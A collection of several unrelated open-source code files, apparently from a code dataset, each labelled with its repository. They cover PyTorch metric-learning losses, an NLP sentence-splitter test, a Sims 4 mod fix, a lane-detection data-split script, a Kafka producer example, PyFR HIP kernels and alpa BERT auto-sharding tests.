list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""
if isinstance(labels, torch.Tensor): labels = labels.detach().cpu().numpy()
label_set, count = np.unique(labels, return_counts=True)
label_set = label_set[count>=2]
pos_pairs = np.array([np.random.choice(np.where(labels==x)[0], 2, replace=False) for x in label_set])
neg_tuples = []
for idx in range(len(pos_pairs)):
neg_tuples.append(pos_pairs[np.delete(np.arange(len(pos_pairs)),idx),1])
neg_tuples = np.array(neg_tuples)
sampled_npairs = [[a,p,*list(neg)] for (a,p),neg in zip(pos_pairs, neg_tuples)]
return sampled_npairs
def pdist(self, A):
"""
Efficient function to compute the distance matrix for a matrix A.
Args:
A: Matrix/Tensor for which the distance matrix is to be computed.
eps: float, minimal distance/clampling value to ensure no zero values.
Returns:
distance_matrix, clamped to ensure no zero values are passed.
"""
prod = torch.mm(A, A.t())
norm = prod.diag().unsqueeze(1).expand_as(prod)
res = (norm + norm.t() - 2 * prod).clamp(min = 0)
return res.clamp(min = 0).sqrt()
def inverse_sphere_distances(self, batch, dist, labels, anchor_label):
"""
Function to utilise the distances of batch samples to compute their
probability of occurence, and using the inverse to sample actual negatives to the resp. anchor.
Args:
batch: torch.Tensor(), batch for which the sampling probabilities w.r.t to the anchor are computed. Used only to extract the shape.
dist: torch.Tensor(), computed distances between anchor to all batch samples.
labels: np.ndarray, labels for each sample for which distances were computed in dist.
anchor_label: float, anchor label
Returns:
distance_matrix, clamped to ensure no zero values are passed.
"""
bs,dim = len(dist),batch.shape[-1]
#negated log-distribution of distances of unit sphere in dimension <dim>
log_q_d_inv = ((2.0 - float(dim)) * torch.log(dist) - (float(dim-3) / 2) * torch.log(1.0 - 0.25 * (dist.pow(2))))
#Set sampling probabilities of positives to zero
log_q_d_inv[np.where(labels==anchor_label)[0]] = 0
q_d_inv = torch.exp(log_q_d_inv - torch.max(log_q_d_inv)) # - max(log) for stability
#Set sampling probabilities of positives to zero
q_d_inv[np.where(labels==anchor_label)[0]] = 0
### NOTE: Cutting of values with high distances made the results slightly worse.
# q_d_inv[np.where(dist>upper_cutoff)[0]] = 0
#Normalize inverted distance for probability distr.
q_d_inv = q_d_inv/q_d_inv.sum()
return q_d_inv.detach().cpu().numpy()
"""================================================================================================="""
### Standard Triplet Loss, finds triplets in Mini-batches.
class TripletLoss(torch.nn.Module):
def __init__(self, margin=1, sampling_method='random'):
"""
Basic Triplet Loss as proposed in 'FaceNet: A Unified Embedding for Face Recognition and Clustering'
Args:
margin: float, Triplet Margin - Ensures that positives aren't placed arbitrarily close to the anchor.
Similarl, negatives should not be placed arbitrarily far away.
sampling_method: Method to use for sampling training triplets. Used for the TupleSampler-class.
"""
super(TripletLoss, self).__init__()
self.margin = margin
self.sampler = TupleSampler(method=sampling_method)
def triplet_distance(self, anchor, positive, negative):
"""
Compute triplet loss.
Args:
anchor, positive, negative: torch.Tensor(), resp. embeddings for anchor, positive and negative samples.
Returns:
triplet loss (torch.Tensor())
"""
return torch.nn.functional.relu((anchor-positive).pow(2).sum()-(anchor-negative).pow(2).sum()+self.margin)
def forward(self, batch, labels):
"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
triplet loss (torch.Tensor(), batch-averaged)
"""
#Sample triplets to use for training.
sampled_triplets = self.sampler.give(batch, labels)
#Compute triplet loss
loss = torch.stack([self.triplet_distance(batch[triplet[0],:],batch[triplet[1],:],batch[triplet[2],:]) for triplet in sampled_triplets])
return torch.mean(loss)
"""================================================================================================="""
### Standard N-Pair Loss.
class NPairLoss(torch.nn.Module):
def __init__(self, l2=0.02):
"""
Basic N-Pair Loss as proposed in 'Improved Deep Metric Learning with Multi-class N-pair Loss Objective'
Args:
l2: float, weighting parameter for weight penality due to embeddings not being normalized.
Returns:
Nothing!
"""
super(NPairLoss, self).__init__()
self.sampler = TupleSampler(method='npair')
self.l2 = l2
def npair_distance(self, anchor, positive, negatives):
"""
Compute basic N-Pair loss.
Args:
anchor, positive, negative: torch.Tensor(), resp. embeddings for anchor, positive and negative samples.
Returns:
n-pair loss (torch.Tensor())
"""
return torch.log(1+torch.sum(torch.exp(anchor.mm((negatives-positive).transpose(0,1)))))
def weightsum(self, anchor, positive):
"""
Compute weight penalty.
NOTE: Only need to penalize anchor and positive since the negatives are created based on these.
Args:
anchor, positive: torch.Tensor(), resp. embeddings for anchor and positive samples.
Returns:
torch.Tensor(), Weight penalty
"""
return torch.sum(anchor**2+positive**2)
def forward(self, batch, labels):
"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
n-pair loss (torch.Tensor(), batch-averaged)
"""
#Sample N-Pairs
sampled_npairs = self.sampler.give(batch, labels)
#Compute basic n=pair loss
loss = torch.stack([self.npair_distance(batch[npair[0]:npair[0]+1,:],batch[npair[1]:npair[1]+1,:],batch[npair[2:],:]) for npair in sampled_npairs])
#Include weight penalty
loss = loss + self.l2*torch.mean(torch.stack([self.weightsum(batch[npair[0],:], batch[npair[1],:]) for npair in sampled_npairs]))
return torch.mean(loss)
"""================================================================================================="""
### MarginLoss with trainable class separation margin beta. Runs on Mini-batches as well.
class MarginLoss(torch.nn.Module):
def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'):
"""
Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'.
Args:
margin: float, fixed triplet margin (see also TripletLoss).
nu: float, regularisation weight for beta. Zero by default (in literature as well).
beta: float, initial value for trainable class margins. Set to default literature value.
n_classes: int, number of target class. Required because it dictates the number of trainable class margins.
beta_constant: bool, set to True if betas should not be trained.
sampling_method: str, sampling method to use to generate training triplets.
Returns:
Nothing!
"""
super(MarginLoss, self).__init__()
self.margin = margin
self.n_classes = n_classes
self.beta_constant = beta_constant
self.beta_val = beta
self.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes)*beta)
self.nu = nu
self.sampling_method = sampling_method
self.sampler = TupleSampler(method=sampling_method)
def forward(self, batch, labels):
"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
margin loss (torch.Tensor(), batch-averaged)
"""
if isinstance(labels, torch.Tensor): labels = labels.detach().cpu().numpy()
sampled_triplets = self.sampler.give(batch, labels)
#Compute distances between anchor-positive and anchor-negative.
d_ap, d_an = [],[]
for triplet in sampled_triplets:
train_triplet = {'Anchor': batch[triplet[0],:], 'Positive':batch[triplet[1],:], 'Negative':batch[triplet[2]]}
pos_dist = ((train_triplet['Anchor']-train_triplet['Positive']).pow(2).sum()+1e-8).pow(1/2)
neg_dist = ((train_triplet['Anchor']-train_triplet['Negative']).pow(2).sum()+1e-8).pow(1/2)
d_ap.append(pos_dist)
d_an.append(neg_dist)
d_ap, d_an = torch.stack(d_ap), torch.stack(d_an)
#Group betas together by anchor class in sampled triplets (as each beta belongs to one class).
if self.beta_constant:
beta = self.beta
else:
beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.cuda.FloatTensor)
#Compute actual margin postive and margin negative loss
pos_loss = torch.nn.functional.relu(d_ap-beta+self.margin)
neg_loss = torch.nn.functional.relu(beta-d_an+self.margin)
#Compute normalization constant
pair_count = torch.sum((pos_loss>0.)+(neg_loss>0.)).type(torch.cuda.FloatTensor)
#Actual Margin Loss
loss = torch.sum(pos_loss+neg_loss) if pair_count==0. else torch.sum(pos_loss+neg_loss)/pair_count
#(Optional) Add regularization penalty on betas.
if self.nu: loss = loss + beta_regularisation_loss.type(torch.cuda.FloatTensor)
return loss
"""================================================================================================="""
### ProxyNCALoss containing trainable class proxies. Works independent of batch size.
class ProxyNCALoss(torch.nn.Module):
def __init__(self, num_proxies, embedding_dim):
"""
Basic ProxyNCA Loss as proposed in 'No Fuss Distance Metric Learning using Proxies'.
Args:
num_proxies: int, number of proxies to use to estimate data groups. Usually set to number of classes.
embedding_dim: int, Required to generate initial proxies which are the same size as the actual data embeddings.
Returns:
Nothing!
"""
super(ProxyNCALoss, self).__init__()
self.num_proxies = num_proxies
self.embedding_dim = embedding_dim
self.PROXIES = torch.nn.Parameter(torch.randn(num_proxies, self.embedding_dim) / 8)
self.all_classes = torch.arange(num_proxies)
def forward(self, batch, labels):
"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
proxynca loss (torch.Tensor(), batch-averaged)
"""
#Normalize batch in case it is not normalized (which should never be the case for ProxyNCA, but still).
#Same for the PROXIES. Note that the multiplication by 3 seems arbitrary, but helps the actual training.
batch = 3*torch.nn.functional.normalize(batch, dim=1)
PROXIES = 3*torch.nn.functional.normalize(self.PROXIES, dim=1)
#Group required proxies
pos_proxies = torch.stack([PROXIES[pos_label:pos_label+1,:] for pos_label in labels])
neg_proxies = torch.stack([torch.cat([self.all_classes[:class_label],self.all_classes[class_label+1:]]) for class_label in labels])
neg_proxies = torch.stack([PROXIES[neg_labels,:] for neg_labels in neg_proxies])
#Compute Proxy-distances
dist_to_neg_proxies = torch.sum((batch[:,None,:]-neg_proxies).pow(2),dim=-1)
dist_to_pos_proxies = torch.sum((batch[:,None,:]-pos_proxies).pow(2),dim=-1)
#Compute final proxy-based NCA loss
negative_log_proxy_nca_loss = torch.mean(dist_to_pos_proxies[:,0] + torch.logsumexp(-dist_to_neg_proxies, dim=1))
return negative_log_proxy_nca_loss
"""================================================================================================="""
class CEClassLoss(torch.nn.Module):
def __init__(self, inp_dim, n_classes):
"""
Basic Cross Entropy Loss for reference. Can be useful.
Contains its own mapping network, so the actual network can remain untouched.
Args:
inp_dim: int, embedding dimension of network.
n_classes: int, number of target classes.
Returns:
Nothing!
"""
super(CEClassLoss, self).__init__()
self.mapper = torch.nn.Sequential(torch.nn.Linear(inp_dim, n_classes))
self.ce_loss = torch.nn.CrossEntropyLoss()
def forward(self, batch, labels):
"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
cross-entropy loss (torch.Tensor(), batch-averaged by default)
"""
return self.ce_loss(self.mapper(batch), labels.type(torch.cuda.LongTensor))
|
tests/pipes/test_sents.py
|
hp0404/spikex
| 339 |
85786
|
from spikex.defaults import spacy_version
from spikex.pipes import SentX
SENTS = [
"This is a bullet list that we want to be a unique sentence:\n"
"\ta) the first bullet;\n"
"\tb) the second bullet;\n"
"\tc) a bullet with nested bullets:\n"
"\t\t1) first nested bullet;"
"\t\t2) second nested bullet."
"\td) last bullet.\n",
"Paragraph title ",
"The title was misformatted with the text. ",
"Now we try to split on abbreviations like Figs. 1 or Fig. 2. ",
"They can create confusion, like No.42 or eg. Num. 42 or U.S.; ",
"these are some cases, but there could it be more out there.",
]
def test_splitta(nlp):
sentx_pipe = SentX() if spacy_version < 3 else "sentx"
nlp.add_pipe(sentx_pipe, before="parser")
doc = nlp("".join(SENTS))
assert len([s for s in doc.sents]) == len(SENTS)
|
src/sims4communitylib/_vanilla_fixes/_sim_full_name.py
|
velocist/TS4CheatsInfo
| 118 |
85788
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
# The purpose of this file is to fix the fact that when trying to access the "full_name" attribute on Sims an empty string is returned.
# noinspection PyBroadException
from sims.sim_info import SimInfo
from sims4communitylib.modinfo import ModInfo
from sims4communitylib.utils.common_injection_utils import CommonInjectionUtils
from sims4communitylib.utils.sims.common_sim_name_utils import CommonSimNameUtils
from sims4communitylib.utils.sims.common_sim_utils import CommonSimUtils
@CommonInjectionUtils.inject_safely_into(ModInfo.get_identity(), SimInfo, 'full_name')
def _common_fix_full_name_returning_empty_string(original, self: SimInfo, *_, **__):
original_value = original(self, *_, **__)
if original_value == '':
return CommonSimNameUtils.get_full_name(CommonSimUtils.get_sim_info(self))
return original_value
|
braindecode/experiments/__init__.py
|
TonioBall/braindecode
| 260 |
85806
|
"""
Convenience classes for experiments, including monitoring and stop criteria.
"""
|
tools/prepare_data_subset.py
|
xiaoMrzhang/Pytorch_Generalized_3D_Lane_Detection
| 186 |
85822
|
"""
This code conduct:
1. exclude a subset of data related to a certain illumination condition from an existing training set
2. keep a subset of data related to the same illumination condition from an existing test set
ATTENTION: this code require to run prepare_data_split.py first
Author: <NAME> (<EMAIL>)
Date: March, 2020
"""
import os
import os.path as ops
if __name__ == '__main__':
batch_size = 8 # use to ignore the last for convenience
# exclude subsets from train
name_pattens_to_exclude = ['/00/', '/01/', '/06/', '/07/']
output_folder = '../data_splits/illus_chg/'
if not ops.exists(output_folder):
os.makedirs(output_folder)
lines_train = []
json_file_path = "../data_splits/standard/train.json"
assert ops.exists(json_file_path), '{:s} not exist'.format(json_file_path)
with open(json_file_path) as f:
lines_i = f.readlines()
f.close()
for line in lines_i:
to_discard = False
for name_patten in name_pattens_to_exclude:
if name_patten in line:
to_discard = True
break
if not to_discard:
lines_train.append(line)
lines_train = lines_train[:len(lines_train)//batch_size*batch_size]
with open(output_folder + '/train.json', 'w') as f:
f.writelines("%s" % l for l in lines_train)
f.close()
#########################################################################################
# include subsets in test
name_pattens_to_include = ['/00/', '/01/', '/06/', '/07/']
lines_test = []
json_file_path = "../data_splits/standard/test.json"
assert ops.exists(json_file_path), '{:s} not exist'.format(json_file_path)
with open(json_file_path) as f:
lines_i = f.readlines()
f.close()
for line in lines_i:
to_discard = False
for name_patten in name_pattens_to_include:
if name_patten in line:
lines_test.append(line)
lines_test = lines_test[:len(lines_test) // batch_size * batch_size]
with open(output_folder + '/test.json', 'w') as f:
f.writelines("%s" % l for l in lines_test)
f.close()
|
example/producer.py
|
Semo/kq
| 582 |
85839
|
from kafka import KafkaProducer
producer = KafkaProducer(bootstrap_servers="127.0.0.1:9092")
for _ in range(10000):
producer.send("my_topic", b"message")
# producer.flush()
|
pyfr/backends/hip/packing.py
|
rishit2307/PyFR
| 185 |
85850
|
# -*- coding: utf-8 -*-
from pyfr.backends.base import NullKernel
from pyfr.backends.hip.provider import (HIPKernel, HIPKernelProvider,
get_grid_for_block)
class HIPPackingKernels(HIPKernelProvider):
def pack(self, mv):
hip = self.backend.hip
# An exchange view is simply a regular view plus an exchange matrix
m, v = mv.xchgmat, mv.view
# Compute the grid and thread-block size
block = (128, 1, 1)
grid = get_grid_for_block(block, v.n)
# Render the kernel template
src = self.backend.lookup.get_template('pack').render(blocksz=block[0])
# Build
kern = self._build_kernel('pack_view', src, 'iiiPPPP')
# Set the arguments
params = kern.make_params(grid, block)
params.set_args(v.n, v.nvrow, v.nvcol, v.basedata, v.mapping,
v.rstrides or 0, m)
# If MPI is HIP aware then we just need to pack the buffer
if self.backend.mpitype == 'hip-aware':
class PackXchgViewKernel(HIPKernel):
def add_to_graph(self, graph, deps):
pass
def run(self, stream):
kern.exec_async(stream, params)
# Otherwise, we need to both pack the buffer and copy it back
else:
class PackXchgViewKernel(HIPKernel):
def add_to_graph(self, graph, deps):
pass
def run(self, stream):
kern.exec_async(stream, params)
hip.memcpy(m.hdata, m.data, m.nbytes, stream)
return PackXchgViewKernel(mats=[mv])
def unpack(self, mv):
hip = self.backend.hip
if self.backend.mpitype == 'hip-aware':
return NullKernel()
else:
class UnpackXchgMatrixKernel(HIPKernel):
def add_to_graph(self, graph, deps):
pass
def run(self, stream):
hip.memcpy(mv.data, mv.hdata, mv.nbytes, stream)
return UnpackXchgMatrixKernel(mats=[mv])
|
tests/test_auto_sharding_bert.py
|
alpa-projects/alpa
| 114 |
85856
|
<filename>tests/test_auto_sharding_bert.py
"""Test auto sharding on transformer layers and bert models."""
import unittest
import jax
import jax.numpy as jnp
import numpy as np
from flax import optim, linen as nn
from alpa import parallelize, ShardParallel, LocalPhysicalDeviceMesh, AutoShardingOption
from alpa.model.bert_model import (BertConfig, FlaxBertLayerCollection,
FlaxBertForMaskedLMModule)
from alpa.util import count_communication_primitives
from test_auto_sharding_mlp import (
assert_all_replicated, assert_close, assert_column_partitioned,
assert_data_parallel_cost, assert_fully_sharded, assert_less_equal,
assert_sharded, assert_replicated_column_partitioned,
assert_replicated_row_partitioned, assert_row_partitioned, is_fully_sharded,
assert_sharding_zero_stage_3)
class AutoShardingAttentionTest(unittest.TestCase):
def setUp(self):
assert len(jax.local_devices()) >= 4
self.physical_mesh = LocalPhysicalDeviceMesh(jax.local_devices()[:4])
self.as_option = AutoShardingOption()
def get_device_mesh(self, shape, mesh_alpha, mesh_beta):
return self.physical_mesh.get_logical_mesh(shape, mesh_alpha, mesh_beta)
def run_bert_layers(self, batch_size, seq_len, num_layers, hidden_size,
num_heads, deterministic, use_remat, device_mesh):
@parallelize(method=ShardParallel(devices=device_mesh,
auto_sharding_option=self.as_option))
def train_step(optimizer, batch, deterministic, apply_fn):
def loss_func(params):
rngs = {"dropout": batch["rng"]}
out = apply_fn(params,
batch["hidden_states"],
batch["attention_mask"],
deterministic,
rngs=rngs)[0]
return jnp.mean((out - batch["label"])**2)
grad = jax.grad(loss_func)(optimizer.target)
new_optimizer = optimizer.apply_gradient(grad)
return new_optimizer
# Init model and optimizer
hidden_states = jnp.ones((batch_size, seq_len, hidden_size),
dtype=jnp.float32)
attention_mask = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
label = jnp.ones((batch_size, seq_len, hidden_size), dtype=jnp.float32)
model = FlaxBertLayerCollection(
BertConfig(num_hidden_layers=num_layers,
hidden_size=hidden_size,
intermediate_size=hidden_size * 4,
num_attention_heads=num_heads,
gradient_checkpointing=use_remat))
rngkey = jax.random.PRNGKey(0)
params = model.init(rngkey, hidden_states, attention_mask)
optimizer = optim.Adam(1e-2).create(params)
# JIT compile
optimizer = train_step(
optimizer, {
"hidden_states": hidden_states,
"attention_mask": attention_mask,
"label": label,
"rng": rngkey
}, deterministic, model.apply)
# Get optimized HLO IR
executable = train_step.get_executable(
optimizer, {
"hidden_states": hidden_states,
"attention_mask": attention_mask,
"label": label,
"rng": rngkey
}, deterministic, model.apply)
return (optimizer, executable.get_hlo_text(),
executable.auto_sharding_objective)
def run_bert_mlm(self, batch_size, seq_len, num_layers, hidden_size,
num_heads, vocab_size, deterministic, device_mesh):
@parallelize(method=ShardParallel(devices=device_mesh,
auto_sharding_option=self.as_option))
def train_step(optimizer, batch):
def loss_func(params):
rngs = {"dropout": batch["rng"]}
logits = model.apply(params,
batch["input_ids"],
batch["attention_mask"],
batch["token_type_ids"],
batch["position_ids"],
deterministic=deterministic,
rngs=rngs)[0]
label_mask = jnp.where(batch["labels"] > 0, 1.0, 0.0)
labels = jax.nn.one_hot(batch["labels"], logits.shape[-1])
loss = -jnp.sum(labels * jax.nn.log_softmax(logits, axis=-1),
axis=-1)
return (label_mask * loss).sum() / label_mask.sum() * 0.1234
grad = jax.grad(loss_func)(optimizer.target)
new_optimizer = optimizer.apply_gradient(grad)
return new_optimizer
# Init model and optimizer
input_ids = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
attention_mask = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
token_type_ids = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
position_ids = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
labels = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
model = FlaxBertForMaskedLMModule(
BertConfig(
num_hidden_layers=num_layers,
hidden_size=hidden_size,
intermediate_size=hidden_size * 4,
num_attention_heads=num_heads,
vocab_size=vocab_size,
max_position_embeddings=seq_len,
))
rngkey = jax.random.PRNGKey(0)
params = model.init(rngkey, input_ids, attention_mask, token_type_ids,
position_ids)
optimizer = optim.Adam(1e-2).create(params)
# JIT compile
optimizer = train_step(
optimizer, {
"input_ids": input_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
"position_ids": position_ids,
"labels": labels,
"rng": rngkey
})
# Get optimized HLO IR
executable = train_step.get_executable(
optimizer, {
"input_ids": input_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
"position_ids": position_ids,
"labels": labels,
"rng": rngkey
})
return (optimizer, executable.get_hlo_text(),
executable.auto_sharding_objective)
def test_bert_layer_data_parallel(self):
batch_size = 64
seq_len = 64
num_layers = 2
hidden_size = 32
num_heads = 8
deterministic = False
use_remat = False
# Test on different logical mesh shapes
for i, mesh_shape in enumerate([(4, 1), (1, 4)]):
device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
assert_data_parallel_cost(optimizer, hlo_ir, objective, device_mesh,
self.as_option, i)
def test_bert_layer_model_parallel(self):
batch_size = 8
seq_len = 8
num_layers = 2
hidden_size = 128
num_heads = 8
deterministic = False
use_remat = False
# Test on different logical mesh shapes
for i, mesh_shape in enumerate([(4, 1), (1, 4)]):
device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
# Check communication cost
expected = (num_layers * 4 - 1) * device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, i)
assert_close(objective, expected)
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir))
if self.as_option.prefer_reduce_scatter:
assert n_total == num_layers * 4 - 1
assert n_all_reduce == num_layers * 4 - 1
assert n_total == n_all_reduce
else:
assert n_total == num_layers * 4 - 1
assert n_all_reduce == num_layers * 4 - 1
assert n_total == n_all_reduce
# Check sharding specification
for k in range(num_layers):
params = optimizer.target["params"][str(k)]
weights = [
params["attention"]["self"]["qvk_combined"]["kernel"],
params["attention"]["output"]["dense"]["kernel"],
params["intermediate"]["dense"]["kernel"],
params["output"]["dense"]["kernel"],
]
for j in range(len(weights)):
if j % 2 == 0:
assert_column_partitioned(weights[j], mesh_shape[i], i)
else:
assert_row_partitioned(weights[j], mesh_shape[i], i)
def test_bert_layer_2d_mesh(self):
batch_size = 8
seq_len = 8
num_layers = 2
hidden_size = 128
num_heads = 8
deterministic = False
use_remat = False
# Test on different logical mesh shapes
mesh_shape = [2, 2]
device_mesh = self.get_device_mesh(mesh_shape, [2, 2], [1, 0.1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
# Check communication cost
params = jax.tree_util.tree_leaves(optimizer.target)
expected = (sum(
device_mesh.all_reduce_cost(
np.prod(x.shape) * 4 / mesh_shape[1], 0)
for x in params) + device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4 / mesh_shape[0], 1) *
(num_layers * 4 - 1))
assert_close(objective, expected)
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir,
ignore_scalar_all_reduce=True))
if self.as_option.prefer_reduce_scatter:
assert n_all_reduce == num_layers * 4 - 1
assert n_reduce_scatter == 2
assert n_all_gather == 1
assert n_total == n_all_reduce + n_reduce_scatter + n_all_gather
else:
assert n_all_reduce == num_layers * 4
assert n_total == n_all_reduce
# Check sharding specification
if self.as_option.prefer_reduce_scatter:
for weight in jax.tree_util.tree_leaves(
optimizer.state.param_states):
if len(weight.shape) > 1:
assert_fully_sharded(weight)
else:
for k in range(num_layers):
params = optimizer.target["params"][str(k)]
weights = [
params["attention"]["self"]["qvk_combined"]["kernel"],
params["attention"]["output"]["dense"]["kernel"],
params["intermediate"]["dense"]["kernel"],
params["output"]["dense"]["kernel"],
]
for j in range(len(weights)):
if j % 2 == 0:
assert_replicated_column_partitioned(
weights[j], mesh_shape)
else:
assert_replicated_row_partitioned(
weights[j], mesh_shape)
def test_bert_layer_force_batch_dim_mapping(self):
batch_size = 64
seq_len = 64
num_layers = 2
hidden_size = 32
num_heads = 8
deterministic = False
use_remat = False
self.as_option.force_batch_dim_to_mesh_dim = 0
# data parallel
device_mesh = self.get_device_mesh([4, 1], [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
assert_data_parallel_cost(optimizer, hlo_ir, objective, device_mesh, self.as_option, 0)
# model parallel (case 1)
device_mesh = self.get_device_mesh([1, 4], [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
expected = (num_layers * 4 - 1) * device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, 1)
assert_close(objective, expected)
# model parallel (case 2)
batch_size = 1
device_mesh = self.get_device_mesh([1, 4], [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
expected = (num_layers * 4 - 1) * device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, 1)
assert_close(objective, expected)
def test_embedding_2d_mesh(self):
vocab_size = 1024
hidden_size = 8
batch_size = 8
seq_len = 8
mesh_shape = [2, 2]
# Model and training step definition
class Model(nn.Module):
"""Tied input and output embedding."""
def setup(self):
self.embed = nn.Embed(vocab_size, hidden_size)
def __call__(self, x):
x = self.embed(x)
embed = self.embed.variables["params"]["embedding"]
x = x @ embed.T
return x
logical_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
@parallelize(method=ShardParallel(devices=logical_mesh))
def func(optimizer, x, y):
def loss_func(params):
out = model.apply(params, x)
y_ = jax.nn.one_hot(y, out.shape[-1])
loss = -jnp.sum(y_ * jax.nn.log_softmax(out, axis=-1), axis=-1)
return loss.sum()
grad = jax.grad(loss_func)(optimizer.target)
new_optimizer = optimizer.apply_gradient(grad)
return new_optimizer
# Init model and optimizer
x = jnp.ones((batch_size, seq_len), np.int32)
y = jnp.ones((batch_size, seq_len), np.int32)
model = Model()
rngkey = jax.random.PRNGKey(0)
params = model.init(rngkey, x)
optimizer = optim.Adam(1e-2).create(params)
# JIT Compile
optimize = func(optimizer, x, y)
# Check communication cost
executable = func.get_executable(optimizer, x, y)
hlo_ir = executable.get_hlo_text()
objective = executable.auto_sharding_objective
params = jax.tree_util.tree_leaves(optimizer.target)
expected = (
logical_mesh.all_reduce_cost(
vocab_size * hidden_size * 4 / mesh_shape[1], 0) +
logical_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4 / mesh_shape[0], 1) * 2 +
logical_mesh.all_reduce_cost(
batch_size * seq_len * 4 / mesh_shape[0], 1) * 2)
assert_close(objective, expected)
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir))
assert n_total == n_all_reduce
def test_bert_mlm_data_parallel(self):
batch_size = 32
seq_len = 32
num_layers = 2
hidden_size = 16
num_heads = 4
vocab_size = 128
deterministic = False
# Test on different logical mesh shapes
for i, mesh_shape in enumerate([(4, 1), (1, 4)]):
device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_mlm(
batch_size, seq_len, num_layers, hidden_size, num_heads,
vocab_size, deterministic, device_mesh)
if self.as_option.force_zero_stage_3:
# only the weight and opt_state of token_embed is not sharded
assert_sharding_zero_stage_3(optimizer, 3)
continue
assert_data_parallel_cost(optimizer, hlo_ir, objective, device_mesh,
self.as_option, i, 1)
@unittest.skip("This test is broken after we disallow some replicated iota."
)
def test_bert_mlm_model_parallel(self):
batch_size = 16
seq_len = 16
num_layers = 2
hidden_size = 128
num_heads = 4
vocab_size = 512
deterministic = False
self.as_option.allow_all_gather = False # Temporary hack
self.as_option.allow_all_to_all = False # Temporary hack
# Test on different logical mesh shapes
for i, mesh_shape in enumerate([(4, 1), (1, 4)]):
device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_mlm(
batch_size, seq_len, num_layers, hidden_size, num_heads,
vocab_size, deterministic, device_mesh)
# Check communication cost
# expected_cost = embed.forward (1) + embed.backward(2) +
# LM_head.forward (1) + LM_head.backward (1) +
# LM_head.weight.backward (1) + log_softmax.forward (2) +
# transformer.forward (2 * num_layers) + transformer.backward (2 * num_layers)
#
# Note that the final cost is different from this estimated cost in ILP solver.
# The SPMD partitioner will eliminate some unnecessary communication in favor of
# redundant computation (e.g., it will elimiate the all-reduce in embed.backward).
expected = (
device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, i) * 5 +
device_mesh.all_reduce_cost(hidden_size * hidden_size * 4, i) +
device_mesh.all_reduce_cost(batch_size * seq_len * 4, i) * 2 +
device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, i) * num_layers * 4)
assert_close(objective, expected)
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir))
# real number of all-reduce = transformers (4 * num_layers) + log_softmax (2) +
# embed.forward (1) + embad.backward (1)
assert n_all_reduce == num_layers * 4 + 4
assert n_total == n_all_reduce
# Check sharding specification
embed_weight = optimizer.target["params"]["bert"]["embeddings"][
"word_embeddings"]["embedding"]
lm_head = optimizer.target["params"]["cls"]["predictions"][
"transform"]["dense"]["kernel"]
assert_row_partitioned(embed_weight, mesh_shape[i], i)
assert_all_replicated(lm_head, np.prod(mesh_shape))
for k in range(num_layers):
params = optimizer.target["params"]["bert"]["encoder"]["layer"][
str(k)]
